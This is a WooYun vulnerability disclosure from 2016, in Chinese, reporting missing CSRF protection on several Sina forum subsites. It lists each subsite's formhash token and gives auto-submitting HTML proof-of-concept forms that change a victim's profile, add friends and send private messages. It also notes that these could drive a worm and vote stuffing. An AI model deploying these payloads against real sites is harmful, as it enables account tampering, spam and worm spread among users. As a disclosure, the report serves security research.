当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0180311

漏洞标题:新浪论坛CSRF打包及危害说明(多个子论坛通用)

相关厂商:新浪

漏洞作者: xyntax

提交时间:2016-03-03 09:38

修复时间:2016-03-03 11:11

公开时间:2016-03-03 11:11

漏洞类型:CSRF

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-03: 细节已通知厂商并且等待厂商处理中
2016-03-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

此漏洞涉及到的新浪子论坛包括但不限于以下站点
星座 http://club.astro.sina.com.cn/ b4201dfd
数码 http://club.tech.sina.com.cn/ b4201dfd
百味 http://club.news.sina.com.cn/ b4201dfd
生活 http://club.life.sina.com.cn/ b4201dfd
女性 http://club.eladies.sina.com.cn/ 4788b761
历史 http://club.history.sina.com.cn/ b4201dfd
军事 http://club.mil.news.sina.com.cn/ b4201dfd
体育 http://club.baby.sina.com.cn/ b4201dfd
亲子 http://club.baby.sina.com.cn/ aec0506d
该论坛模板未检验referrer且无有效token验证造成CSRF
可利用点主要有:

微信截图_20160303000013.png


微信截图_20160302235957.png


其中可以利用CSRF
修改个人资料
发送短消息(有“发送给全部好友”功能,正好方便蠕虫利用)
利用蠕虫+投票系统可以实现刷票,刷关注,刷收藏等等
post中没有检验referrer,唯一有区分的是formhash参数,这个参数在各个论坛的值已在前文url后面标明

漏洞证明:

以亲子论坛为例,时间有限只测试了四个位置,估计整个论坛都没有做csrf的防护,其他重要位置还请自行检测^_^
1 修改用户信息

<form action="http://club.baby.sina.com.cn/memcp.php?action=profile&typeid=2" method="post"> 
<input type="hidden" name="formhash" value="aec0506d" />
<input type="hidden" name="nicknamenew" value="GAY21888" />
<input type="hidden" name="gendernew" value="0" />
<input type="hidden" name="bdaynew" value="0000-00-00" />
<input type="hidden" name="locationnew" value="" />
<input type="hidden" name="sitenew" value="" />
<input type="hidden" name="qqnew" value="" />
<input type="hidden" name="msnnew" value="" />
<input type="hidden" name="taobaonew" value="" />
<input type="hidden" name="alipaynew" value="" />
<input type="hidden" name="editsubmit" value="true" />
<script> document.forms[0].submit(); </script>
</form>


微信截图_20160302231127.png


2 添加好友

<form action="http://club.baby.sina.com.cn/default.php" method="post"> 
<input type="hidden" name="s" value="user" />
<input type="hidden" name="a" value="addfriend" />
<input type="hidden" name="uid" value="2055838954" />
<script> document.forms[0].submit(); </script>
</form>


点击该页面后返回值为1表示添加成功,-3表示未登陆,-7表示已有该好友

微信截图_20160302231546.png


3 向好友发送短消息

<form action="http://club.baby.sina.com.cn/pm.php?action=send&pmsubmit=yes" method="post"> 
<input type="hidden" name="formhash" value="aec0506d" />
<input type="hidden" name="msgto" value="" />
<input type="hidden" name="msgtobuddys%5B%5D" value="2055838954" />
<input type="hidden" name="subject" value="test" />
<input type="hidden" name="message" value="test" />
<script> document.forms[0].submit(); </script>
</form>


4C60.tmp.jpg


4 刷投票
我删了cookies截的图

投票.png


可以看到投票成功

投票2.png


修复方案:

你们更专业!

版权声明:转载请注明来源 xyntax@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-03 11:11

厂商回复:

最新状态:

暂无


漏洞评价:

评价